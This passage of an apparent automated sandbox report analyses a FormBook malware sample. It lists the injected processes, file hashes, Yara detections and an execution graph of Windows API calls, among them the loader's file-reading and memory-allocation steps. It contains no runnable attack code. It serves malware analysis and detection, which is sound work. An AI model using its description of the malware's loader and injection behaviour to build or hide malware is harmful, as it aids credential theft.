                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1970475170.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1972961447.0000000005F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1971212248.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:21:24:20
                                                        Start date:18/11/2024
                                                        Path:C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe"
                                                        Imagebase:0x770000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2933293097.0000000002520000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:21:24:22
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\srdelayed.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                        Imagebase:0x110000
                                                        File size:16'384 bytes
                                                        MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:21:24:22
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\ktmutil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                        Imagebase:0xb70000
                                                        File size:15'360 bytes
                                                        MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2931811558.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2933217296.0000000003410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2933301048.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:21:24:35
                                                        Start date:18/11/2024
                                                        Path:C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe"
                                                        Imagebase:0x770000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2934945031.0000000005220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:9
                                                        Start time:21:24:48
                                                        Start date:18/11/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff6bf500000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.6%
                                                          Dynamic/Decrypted Code Coverage:1%
                                                          Signature Coverage:4.6%
                                                          Total number of Nodes:1871
                                                          Total number of Limit Nodes:139
                                                          execution_graph 92091 1073ac0 92105 1071710 92091->92105 92093 1073b5d 92108 10739b0 92093->92108 92095 1073b86 CreateFileW 92097 1073bda 92095->92097 92099 1073bd5 92095->92099 92098 1073bf1 VirtualAlloc 92097->92098 92097->92099 92098->92099 92100 1073c0f ReadFile 92098->92100 92100->92099 92101 1073c2a 92100->92101 92102 10729b0 13 API calls 92101->92102 92103 1073c5d 92102->92103 92104 1073c80 ExitProcess 92103->92104 92104->92099 92111 1074b80 GetPEB 92105->92111 92107 1071d9b 92107->92093 92109 10739b9 Sleep 92108->92109 92110 10739c7 92109->92110 92112 1074baa 92111->92112 92112->92107 92113 6519dd 92118 5e4a30 92113->92118 92115 6519f1 92138 600f0a 52 API calls __cinit 92115->92138 92117 6519fb 92119 5e4a40 __ftell_nolock 92118->92119 92139 5ed7f7 92119->92139 92123 5e4aff 92151 5e363c 92123->92151 92130 5ed7f7 48 API calls 92131 5e4b32 92130->92131 92173 5e49fb 92131->92173 92133 5e4b43 Mailbox 92133->92115 92134 5e61a6 48 API calls 92137 5e4b3d _wcscat Mailbox __NMSG_WRITE 92134->92137 92136 5e64cf 48 API calls 92136->92137 92137->92133 92137->92134 92137->92136 92187 5ece19 92137->92187 92138->92117 92193 5ff4ea 92139->92193 92141 5ed818 92142 5ff4ea 48 API calls 92141->92142 92143 5e4af6 92142->92143 92144 5e5374 92143->92144 92224 60f8a0 92144->92224 92147 5ece19 48 API calls 92148 5e53a7 92147->92148 92226 5e660f 92148->92226 92150 5e53b1 Mailbox 92150->92123 92152 5e3649 __ftell_nolock 92151->92152 92273 5e366c GetFullPathNameW 92152->92273 92154 5e365a 92155 5e6a63 48 API calls 92154->92155 92156 5e3669 92155->92156 92157 5e518c 92156->92157 92158 5e5197 92157->92158 92159 5e519f 92158->92159 92160 651ace 92158->92160 92275 5e5130 92159->92275 92162 5e6b4a 48 API calls 92160->92162 92164 651adb __NMSG_WRITE 92162->92164 92163 5e4b18 92167 5e64cf 92163->92167 92165 5fee75 48 API calls 92164->92165 92166 651b07 ___crtGetEnvironmentStringsW 92165->92166 92168 5e64dd ___crtGetEnvironmentStringsW 92167->92168 92169 5e651b 92167->92169 92170 5ff4ea 48 API calls 92168->92170 92172 5ff4ea 48 API calls 92169->92172 92171 5e4b29 92170->92171 92171->92130 92172->92168 92290 5ebcce 92173->92290 92176 5e4a2b 92176->92137 92177 6541cc RegQueryValueExW 92178 6541e5 92177->92178 92179 654246 RegCloseKey 92177->92179 92180 5ff4ea 48 API calls 92178->92180 92181 6541fe 92180->92181 92296 5e47b7 92181->92296 92184 654224 92186 5e6a63 48 API calls 92184->92186 92185 65423b 92185->92179 92186->92185 92188 5ece28 __NMSG_WRITE 92187->92188 92189 5fee75 48 API calls 92188->92189 92190 5ece50 ___crtGetEnvironmentStringsW 92189->92190 92191 5ff4ea 48 API calls 92190->92191 92192 5ece66 92191->92192 92192->92137 92196 5ff4f2 __calloc_impl 92193->92196 92195 5ff50c 92195->92141 92196->92195 92197 5ff50e std::exception::exception 92196->92197 92202 60395c 92196->92202 92216 606805 RaiseException 92197->92216 92199 5ff538 92217 60673b 47 API calls _free 92199->92217 92201 5ff54a 92201->92141 92203 6039d7 __calloc_impl 92202->92203 92207 603968 __calloc_impl 92202->92207 92223 607c0e 47 API calls __getptd_noexit 92203->92223 92206 60399b RtlAllocateHeap 92206->92207 92215 6039cf 92206->92215 92207->92206 92209 6039c3 92207->92209 92210 603973 92207->92210 92213 6039c1 92207->92213 92221 607c0e 47 API calls __getptd_noexit 92209->92221 92210->92207 92218 6081c2 47 API calls 2 library calls 92210->92218 92219 60821f 47 API calls 7 library calls 92210->92219 92220 601145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92210->92220 92222 607c0e 47 API calls __getptd_noexit 92213->92222 92215->92196 92216->92199 92217->92201 92218->92210 92219->92210 92221->92213 92222->92215 92223->92215 92225 5e5381 GetModuleFileNameW 92224->92225 92225->92147 92227 60f8a0 __ftell_nolock 92226->92227 92228 5e661c GetFullPathNameW 92227->92228 92233 5e6a63 92228->92233 92230 5e6643 92244 5e6571 92230->92244 92234 5e6adf 92233->92234 92237 5e6a6f __NMSG_WRITE 92233->92237 92261 5eb18b 92234->92261 92236 5e6ab6 ___crtGetEnvironmentStringsW 92236->92230 92238 5e6a8b 92237->92238 92239 5e6ad7 92237->92239 92248 5e6b4a 92238->92248 92260 5ec369 48 API calls 92239->92260 92242 5e6a95 92251 5fee75 92242->92251 92245 5e657f 92244->92245 92246 5eb18b 48 API calls 92245->92246 92247 5e658f 92246->92247 92247->92150 92249 5ff4ea 48 API calls 92248->92249 92250 5e6b54 92249->92250 92250->92242 92253 5ff4ea __calloc_impl 92251->92253 92252 60395c __malloc_crt 47 API calls 92252->92253 92253->92252 92254 5ff50c 92253->92254 92255 5ff50e std::exception::exception 92253->92255 92254->92236 92265 606805 RaiseException 92255->92265 92257 5ff538 92266 60673b 47 API calls _free 92257->92266 92259 5ff54a 92259->92236 92260->92236 92262 5eb1a2 ___crtGetEnvironmentStringsW 92261->92262 92263 5eb199 92261->92263 92262->92236 92263->92262 92267 5ebdfa 92263->92267 92265->92257 92266->92259 92268 5ebe0d 92267->92268 92272 5ebe0a ___crtGetEnvironmentStringsW 92267->92272 92269 5ff4ea 48 API calls 92268->92269 92270 5ebe17 92269->92270 92271 5fee75 48 API calls 92270->92271 92271->92272 92272->92262 92274 5e368a 92273->92274 92274->92154 92276 5e513f __NMSG_WRITE 92275->92276 92277 651b27 92276->92277 92278 5e5151 92276->92278 92280 5e6b4a 48 API calls 92277->92280 92285 5ebb85 92278->92285 92282 651b34 92280->92282 92281 5e515e ___crtGetEnvironmentStringsW 92281->92163 92283 5fee75 48 API calls 92282->92283 92284 651b57 ___crtGetEnvironmentStringsW 92283->92284 92286 5ebb9b 92285->92286 92289 5ebb96 ___crtGetEnvironmentStringsW 92285->92289 92287 5fee75 48 API calls 92286->92287 92288 651b77 92286->92288 92287->92289 92288->92288 92289->92281 92291 5e4a0a RegOpenKeyExW 92290->92291 92292 5ebce8 92290->92292 92291->92176 92291->92177 92293 5ff4ea 48 API calls 92292->92293 92294 5ebcf2 92293->92294 92295 5fee75 48 API calls 92294->92295 92295->92291 92297 5ff4ea 48 API calls 92296->92297 92298 5e47c9 RegQueryValueExW 92297->92298 92298->92184 92298->92185 92299 659bec 92337 5f0ae0 Mailbox ___crtGetEnvironmentStringsW 92299->92337 92301 5ff4ea 48 API calls 92301->92337 92304 5f0509 92391 62cc5c 86 API calls 4 library calls 92304->92391 92305 5f146e 92313 5e6eed 48 API calls 92305->92313 92308 5ff4ea 48 API calls 92329 5efec8 92308->92329 92309 5f1473 92390 62cc5c 86 API calls 4 library calls 92309->92390 92311 5e6eed 48 API calls 92311->92329 92312 65a246 92382 5e6eed 92312->92382 92330 5effe1 Mailbox 92313->92330 92315 65a922 92319 65a873 92320 6197ed InterlockedDecrement 92320->92329 92321 65a30e 92321->92330 92386 6197ed InterlockedDecrement 92321->92386 92322 5ed7f7 48 API calls 92322->92329 92323 5ece19 48 API calls 92323->92337 92325 600f0a 52 API calls __cinit 92325->92329 92326 65a973 92392 62cc5c 86 API calls 4 library calls 92326->92392 92328 65a982 92329->92304 92329->92305 92329->92308 92329->92309 92329->92311 92329->92312 92329->92320 92329->92321 92329->92322 92329->92325 92329->92326 92329->92330 92331 5f15b5 92329->92331 92347 5f1820 335 API calls 2 library calls 92329->92347 92348 5f1d10 59 API calls Mailbox 92329->92348 92389 62cc5c 86 API calls 4 library calls 92331->92389 92334 65a706 92387 62cc5c 86 API calls 4 library calls 92334->92387 92336 5f1526 Mailbox 92388 62cc5c 86 API calls 4 library calls 92336->92388 92337->92301 92337->92323 92337->92329 92337->92330 92337->92334 92337->92336 92338 6197ed InterlockedDecrement 92337->92338 92341 640d1d 92337->92341 92344 640d09 92337->92344 92349 5efe30 92337->92349 92378 63ef61 82 API calls 2 library calls 92337->92378 92379 63f0ac 90 API calls Mailbox 92337->92379 92380 62a6ef 48 API calls 92337->92380 92381 63e822 335 API calls Mailbox 92337->92381 92338->92337 92393 63f8ae 92341->92393 92343 640d2d 92343->92337 92345 63f8ae 129 API calls 92344->92345 92346 640d19 92345->92346 92346->92337 92347->92329 92348->92329 92350 5efe50 92349->92350 92374 5efe7e 92349->92374 92351 5ff4ea 48 API calls 92350->92351 92351->92374 92352 600f0a 52 API calls __cinit 92352->92374 92353 5f146e 92354 5e6eed 48 API calls 92353->92354 92376 5effe1 92354->92376 92355 5ff4ea 48 API calls 92355->92374 92356 6197ed InterlockedDecrement 92356->92374 92357 5ed7f7 48 API calls 92357->92374 92358 5f0509 92537 62cc5c 86 API calls 4 library calls 92358->92537 92362 65a246 92365 5e6eed 48 API calls 92362->92365 92363 5f1473 92536 62cc5c 86 API calls 4 library calls 92363->92536 92364 65a922 92364->92337 92365->92376 92368 5e6eed 48 API calls 92368->92374 92369 65a873 92369->92337 92370 65a30e 92370->92376 92534 6197ed InterlockedDecrement 92370->92534 92372 65a973 92538 62cc5c 86 API calls 4 library calls 92372->92538 92374->92352 92374->92353 92374->92355 92374->92356 92374->92357 92374->92358 92374->92362 92374->92363 92374->92368 92374->92370 92374->92372 92374->92376 92377 5f15b5 92374->92377 92532 5f1820 335 API calls 2 library calls 92374->92532 92533 5f1d10 59 API calls Mailbox 92374->92533 92375 65a982 92376->92337 92535 62cc5c 86 API calls 4 library calls 92377->92535 92378->92337 92379->92337 92380->92337 92381->92337 92383 5e6ef8 92382->92383 92384 5e6f00 92382->92384 92539 5edd47 48 API calls ___crtGetEnvironmentStringsW 92383->92539 92384->92330 92386->92330 92387->92336 92388->92330 92389->92330 92390->92319 92391->92315 92392->92328 92429 5e936c 92393->92429 92395 63f8ea 92410 63f92c Mailbox 92395->92410 92449 640567 92395->92449 92397 63fb8b 92398 63fcfa 92397->92398 92403 63fb95 92397->92403 92512 640688 89 API calls Mailbox 92398->92512 92401 63fd07 92402 63fd13 92401->92402 92401->92403 92402->92410 92462 63f70a 92403->92462 92404 5e936c 81 API calls 92413 63f984 Mailbox 92404->92413 92409 63fbc9 92476 5fed18 92409->92476 92410->92343 92413->92397 92413->92404 92413->92410 92480 6429e8 48 API calls ___crtGetEnvironmentStringsW 92413->92480 92481 63fda5 60 API calls 2 library calls 92413->92481 92414 63fbe3 92482 62cc5c 86 API calls 4 library calls 92414->92482 92415 63fbfd 92483 5fc050 92415->92483 92418 63fbee GetCurrentProcess TerminateProcess 92418->92415 92419 63fc14 92428 63fc3e 92419->92428 92494 5f1b90 92419->92494 92421 63fd65 92421->92410 92425 63fd7e FreeLibrary 92421->92425 92422 63fc2d 92510 64040f 105 API calls _free 92422->92510 92424 5f1b90 48 API calls 92424->92428 92425->92410 92428->92421 92428->92424 92511 5edcae 50 API calls Mailbox 92428->92511 92513 64040f 105 API calls _free 92428->92513 92430 5e9384 92429->92430 92431 5e9380 92429->92431 92432 654cbd __i64tow 92430->92432 92433 5e9398 92430->92433 92434 654bbf 92430->92434 92442 5e93b0 __itow Mailbox _wcscpy 92430->92442 92431->92395 92514 60172b 80 API calls 3 library calls 92433->92514 92435 654ca5 92434->92435 92436 654bc8 92434->92436 92515 60172b 80 API calls 3 library calls 92435->92515 92441 654be7 92436->92441 92436->92442 92439 5ff4ea 48 API calls 92440 5e93ba 92439->92440 92440->92431 92443 5ece19 48 API calls 92440->92443 92444 5ff4ea 48 API calls 92441->92444 92442->92439 92443->92431 92445 654c04 92444->92445 92446 5ff4ea 48 API calls 92445->92446 92447 654c2a 92446->92447 92447->92431 92448 5ece19 48 API calls 92447->92448 92448->92431 92450 5ebdfa 48 API calls 92449->92450 92451 640582 CharLowerBuffW 92450->92451 92516 621f11 92451->92516 92455 5ed7f7 48 API calls 92456 6405bb 92455->92456 92523 5e69e9 48 API calls ___crtGetEnvironmentStringsW 92456->92523 92457 64061a Mailbox 92457->92413 92459 6405d2 92460 5eb18b 48 API calls 92459->92460 92461 6405de Mailbox 92460->92461 92461->92457 92524 63fda5 60 API calls 2 library calls 92461->92524 92463 63f725 92462->92463 92467 63f77a 92462->92467 92464 5ff4ea 48 API calls 92463->92464 92465 63f747 92464->92465 92466 5ff4ea 48 API calls 92465->92466 92465->92467 92466->92465 92468 640828 92467->92468 92469 640a53 Mailbox 92468->92469 92475 64084b _strcat _wcscpy __NMSG_WRITE 92468->92475 92469->92409 92470 5ecf93 58 API calls 92470->92475 92471 5ed286 48 API calls 92471->92475 92472 5e936c 81 API calls 92472->92475 92473 60395c 47 API calls __malloc_crt 92473->92475 92475->92469 92475->92470 92475->92471 92475->92472 92475->92473 92527 628035 50 API calls __NMSG_WRITE 92475->92527 92477 5fed2d 92476->92477 92478 5fedc5 VirtualProtect 92477->92478 92479 5fed93 92477->92479 92478->92479 92479->92414 92479->92415 92480->92413 92481->92413 92482->92418 92484 5fc064 92483->92484 92486 5fc069 Mailbox 92483->92486 92528 5fc1af 48 API calls 92484->92528 92492 5fc077 92486->92492 92529 5fc15c 48 API calls 92486->92529 92488 5ff4ea 48 API calls 92490 5fc108 92488->92490 92489 5fc152 92489->92419 92491 5ff4ea 48 API calls 92490->92491 92493 5fc113 92491->92493 92492->92488 92492->92489 92493->92419 92495 5f1cf6 92494->92495 92498 5f1ba2 92494->92498 92495->92422 92496 5f1bae 92501 5f1bb9 92496->92501 92531 5fc15c 48 API calls 92496->92531 92498->92496 92499 5ff4ea 48 API calls 92498->92499 92500 6549c4 92499->92500 92503 5ff4ea 48 API calls 92500->92503 92502 5f1c5d 92501->92502 92504 5ff4ea 48 API calls 92501->92504 92502->92422 92509 6549cf 92503->92509 92505 5f1c9f 92504->92505 92506 5f1cb2 92505->92506 92530 5e2925 48 API calls 92505->92530 92506->92422 92508 5ff4ea 48 API calls 92508->92509 92509->92496 92509->92508 92510->92428 92511->92428 92512->92401 92513->92428 92514->92442 92515->92442 92517 621f3b __NMSG_WRITE 92516->92517 92518 621f79 92517->92518 92519 621f6f 92517->92519 92521 621ffa 92517->92521 92518->92455 92518->92461 92519->92518 92525 5fd37a 60 API calls 92519->92525 92521->92518 92526 5fd37a 60 API calls 92521->92526 92523->92459 92524->92457 92525->92519 92526->92521 92527->92475 92528->92486 92529->92492 92530->92506 92531->92501 92532->92374 92533->92374 92534->92376 92535->92376 92536->92369 92537->92364 92538->92375 92539->92384 92540 5e3742 92541 5e374b 92540->92541 92542 5e37c8 92541->92542 92543 5e3769 92541->92543 92584 5e37c6 92541->92584 92545 5e37ce 92542->92545 92546 651e00 92542->92546 92547 5e382c PostQuitMessage 92543->92547 92548 5e3776 92543->92548 92544 5e37ab DefWindowProcW 92580 5e37b9 92544->92580 92549 5e37f6 SetTimer RegisterWindowMessageW 92545->92549 92550 5e37d3 92545->92550 92589 5e2ff6 16 API calls 92546->92589 92547->92580 92552 651e88 92548->92552 92553 5e3781 92548->92553 92557 5e381f CreatePopupMenu 92549->92557 92549->92580 92554 5e37da KillTimer 92550->92554 92555 651da3 92550->92555 92604 624ddd 60 API calls _memset 92552->92604 92558 5e3789 92553->92558 92559 5e3836 92553->92559 92585 5e3847 Shell_NotifyIconW _memset 92554->92585 92561 651ddc MoveWindow 92555->92561 92562 651da8 92555->92562 92556 651e27 92590 5fe312 335 API calls Mailbox 92556->92590 92557->92580 92565 651e6d 92558->92565 92566 5e3794 92558->92566 92587 5feb83 53 API calls _memset 92559->92587 92561->92580 92569 651dac 92562->92569 92570 651dcb SetFocus 92562->92570 92565->92544 92603 61a5f3 48 API calls 92565->92603 92572 5e379f 92566->92572 92573 651e58 92566->92573 92567 651e9a 92567->92544 92567->92580 92569->92572 92575 651db5 92569->92575 92570->92580 92571 5e37ed 92586 5e390f DeleteObject DestroyWindow Mailbox 92571->92586 92572->92544 92591 5e3847 Shell_NotifyIconW _memset 92572->92591 92602 6255bd 70 API calls _memset 92573->92602 92574 5e3845 92574->92580 92588 5e2ff6 16 API calls 92575->92588 92582 651e4c 92592 5e4ffc 92582->92592 92584->92544 92585->92571 92586->92580 92587->92574 92588->92580 92589->92556 92590->92572 92591->92582 92593 5e5027 _memset 92592->92593 92605 5e4c30 92593->92605 92596 5e50ac 92598 5e50ca Shell_NotifyIconW 92596->92598 92599 653d28 Shell_NotifyIconW 92596->92599 92609 5e51af 92598->92609 92601 5e50df 92601->92584 92602->92574 92603->92584 92604->92567 92606 653c33 92605->92606 92607 5e4c44 92605->92607 92606->92607 92608 653c3c DestroyIcon 92606->92608 92607->92596 92631 625819 61 API calls _W_store_winword 92607->92631 92608->92607 92610 5e51cb 92609->92610 92611 5e52a2 Mailbox 92609->92611 92632 5e6b0f 92610->92632 92611->92601 92614 653ca1 LoadStringW 92618 653cbb 92614->92618 92615 5e51e6 92616 5e6a63 48 API calls 92615->92616 92617 5e51fb 92616->92617 92617->92618 92619 5e520c 92617->92619 92620 5e510d 48 API calls 92618->92620 92621 5e5216 92619->92621 92622 5e52a7 92619->92622 92625 653cc5 92620->92625 92637 5e510d 92621->92637 92623 5e6eed 48 API calls 92622->92623 92628 5e5220 _memset _wcscpy 92623->92628 92626 5e518c 48 API calls 92625->92626 92625->92628 92627 653ce7 92626->92627 92630 5e518c 48 API calls 92627->92630 92629 5e5288 Shell_NotifyIconW 92628->92629 92629->92611 92630->92628 92631->92596 92633 5ff4ea 48 API calls 92632->92633 92634 5e6b34 92633->92634 92635 5e6b4a 48 API calls 92634->92635 92636 5e51d9 92635->92636 92636->92614 92636->92615 92638 5e511f 92637->92638 92639 651be7 92637->92639 92646 5eb384 92638->92646 92655 61a58f 48 API calls ___crtGetEnvironmentStringsW 92639->92655 92642 5e512b 92642->92628 92643 651bf1 92644 5e6eed 48 API calls 92643->92644 92645 651bf9 Mailbox 92644->92645 92647 5eb392 92646->92647 92654 5eb3c5 ___crtGetEnvironmentStringsW 92646->92654 92648 5eb3fd 92647->92648 92649 5eb3b8 92647->92649 92647->92654 92651 5ff4ea 48 API calls 92648->92651 92650 5ebb85 48 API calls 92649->92650 92650->92654 92652 5eb407 92651->92652 92653 5ff4ea 48 API calls 92652->92653 92653->92654 92654->92642 92655->92643 92656 658eb8 92660 62a635 92656->92660 92658 658ec3 92659 62a635 84 API calls 92658->92659 92659->92658 92661 62a66f 92660->92661 92665 62a642 92660->92665 92661->92658 92662 62a671 92672 5fec4e 81 API calls 92662->92672 92664 62a676 92666 5e936c 81 API calls 92664->92666 92665->92661 92665->92662 92665->92664 92669 62a669 92665->92669 92667 62a67d 92666->92667 92668 5e510d 48 API calls 92667->92668 92668->92661 92671 5f4525 61 API calls ___crtGetEnvironmentStringsW 92669->92671 92671->92661 92672->92664 92673 605dfd 92674 605e09 _flsall 92673->92674 92710 607eeb GetStartupInfoW 92674->92710 92676 605e0e 92712 609ca7 GetProcessHeap 92676->92712 92678 605e66 92679 605e71 92678->92679 92797 605f4d 47 API calls 3 library calls 92678->92797 92713 607b47 92679->92713 92682 605e77 92683 605e82 __RTC_Initialize 92682->92683 92798 605f4d 47 API calls 3 library calls 92682->92798 92734 60acb3 92683->92734 92686 605e91 92687 605e9d GetCommandLineW 92686->92687 92799 605f4d 47 API calls 3 library calls 92686->92799 92753 612e7d GetEnvironmentStringsW 92687->92753 92690 605e9c 92690->92687 92694 605ec2 92766 612cb4 92694->92766 92697 605ec8 92698 605ed3 92697->92698 92801 60115b 47 API calls 3 library calls 92697->92801 92780 601195 92698->92780 92701 605edb 92702 605ee6 __wwincmdln 92701->92702 92802 60115b 47 API calls 3 library calls 92701->92802 92784 5e3a0f 92702->92784 92705 605efa 92706 605f09 92705->92706 92803 6013f1 47 API calls _doexit 92705->92803 92804 601186 47 API calls _doexit 92706->92804 92709 605f0e _flsall 92711 607f01 92710->92711 92711->92676 92712->92678 92805 60123a 30 API calls 2 library calls 92713->92805 92715 607b4c 92806 607e23 InitializeCriticalSectionAndSpinCount 92715->92806 92717 607b51 92718 607b55 92717->92718 92808 607e6d TlsAlloc 92717->92808 92807 607bbd 50 API calls 2 library calls 92718->92807 92721 607b5a 92721->92682 92722 607b67 92722->92718 92723 607b72 92722->92723 92809 606986 92723->92809 92726 607bb4 92817 607bbd 50 API calls 2 library calls 92726->92817 92729 607b93 92729->92726 92731 607b99 92729->92731 92730 607bb9 92730->92682 92816 607a94 47 API calls 4 library calls 92731->92816 92733 607ba1 GetCurrentThreadId 92733->92682 92735 60acbf _flsall 92734->92735 92826 607cf4 92735->92826 92737 60acc6 92738 606986 __calloc_crt 47 API calls 92737->92738 92739 60acd7 92738->92739 92740 60ad42 GetStartupInfoW 92739->92740 92741 60ace2 _flsall @_EH4_CallFilterFunc@8 92739->92741 92748 60ae80 92740->92748 92750 60ad57 92740->92750 92741->92686 92742 60af44 92833 60af58 LeaveCriticalSection _doexit 92742->92833 92744 60aec9 GetStdHandle 92744->92748 92745 606986 __calloc_crt 47 API calls 92745->92750 92746 60aedb GetFileType 92746->92748 92747 60ada5 92747->92748 92751 60ade5 InitializeCriticalSectionAndSpinCount 92747->92751 92752 60add7 GetFileType 92747->92752 92748->92742 92748->92744 92748->92746 92749 60af08 InitializeCriticalSectionAndSpinCount 92748->92749 92749->92748 92750->92745 92750->92747 92750->92748 92751->92747 92752->92747 92752->92751 92754 605ead 92753->92754 92755 612e8e 92753->92755 92760 612a7b GetModuleFileNameW 92754->92760 92872 6069d0 47 API calls __malloc_crt 92755->92872 92758 612eb4 ___crtGetEnvironmentStringsW 92759 612eca FreeEnvironmentStringsW 92758->92759 92759->92754 92762 612aaf _wparse_cmdline 92760->92762 92761 605eb7 92761->92694 92800 60115b 47 API calls 3 library calls 92761->92800 92762->92761 92763 612ae9 92762->92763 92873 6069d0 47 API calls __malloc_crt 92763->92873 92765 612aef _wparse_cmdline 92765->92761 92767 612ccd __NMSG_WRITE 92766->92767 92771 612cc5 92766->92771 92768 606986 __calloc_crt 47 API calls 92767->92768 92776 612cf6 __NMSG_WRITE 92768->92776 92769 612d4d 92770 601c9d _free 47 API calls 92769->92770 92770->92771 92771->92697 92772 606986 __calloc_crt 47 API calls 92772->92776 92773 612d72 92775 601c9d _free 47 API calls 92773->92775 92775->92771 92776->92769 92776->92771 92776->92772 92776->92773 92777 612d89 92776->92777 92874 612567 47 API calls __cftog_l 92776->92874 92875 606e20 IsProcessorFeaturePresent 92777->92875 92779 612d95 92779->92697 92781 6011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 92780->92781 92783 6011e0 __IsNonwritableInCurrentImage 92781->92783 92898 600f0a 52 API calls __cinit 92781->92898 92783->92701 92785 5e3a29 92784->92785 92786 651ebf 92784->92786 92787 5e3a63 IsThemeActive 92785->92787 92899 601405 92787->92899 92791 5e3a8f 92911 5e3adb SystemParametersInfoW SystemParametersInfoW 92791->92911 92793 5e3a9b 92912 5e3d19 92793->92912 92795 5e3aa3 SystemParametersInfoW 92796 5e3ac8 92795->92796 92796->92705 92797->92679 92798->92683 92799->92690 92803->92706 92804->92709 92805->92715 92806->92717 92807->92721 92808->92722 92811 60698d 92809->92811 92812 6069ca 92811->92812 92813 6069ab Sleep 92811->92813 92818 6130aa 92811->92818 92812->92726 92815 607ec9 TlsSetValue 92812->92815 92814 6069c2 92813->92814 92814->92811 92814->92812 92815->92729 92816->92733 92817->92730 92819 6130b5 92818->92819 92823 6130d0 __calloc_impl 92818->92823 92820 6130c1 92819->92820 92819->92823 92825 607c0e 47 API calls __getptd_noexit 92820->92825 92821 6130e0 RtlAllocateHeap 92821->92823 92824 6130c6 92821->92824 92823->92821 92823->92824 92824->92811 92825->92824 92827 607d05 92826->92827 92828 607d18 EnterCriticalSection 92826->92828 92834 607d7c 92827->92834 92828->92737 92830 607d0b 92830->92828 92858 60115b 47 API calls 3 library calls 92830->92858 92833->92741 92835 607d88 _flsall 92834->92835 92836 607d91 92835->92836 92837 607da9 92835->92837 92859 6081c2 47 API calls 2 library calls 92836->92859 92839 607e11 _flsall 92837->92839 92852 607da7 92837->92852 92839->92830 92840 607d96 92860 60821f 47 API calls 7 library calls 92840->92860 92842 607dbd 92844 607dd3 92842->92844 92845 607dc4 92842->92845 92848 607cf4 __lock 46 API calls 92844->92848 92863 607c0e 47 API calls __getptd_noexit 92845->92863 92846 607d9d 92861 601145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92846->92861 92851 607dda 92848->92851 92850 607dc9 92850->92839 92853 607de9 InitializeCriticalSectionAndSpinCount 92851->92853 92854 607dfe 92851->92854 92852->92837 92862 6069d0 47 API calls __malloc_crt 92852->92862 92855 607e04 92853->92855 92864 601c9d 92854->92864 92870 607e1a LeaveCriticalSection _doexit 92855->92870 92859->92840 92860->92846 92862->92842 92863->92850 92865 601ca6 RtlFreeHeap 92864->92865 92869 601ccf __dosmaperr 92864->92869 92866 601cbb 92865->92866 92865->92869 92871 607c0e 47 API calls __getptd_noexit 92866->92871 92868 601cc1 GetLastError 92868->92869 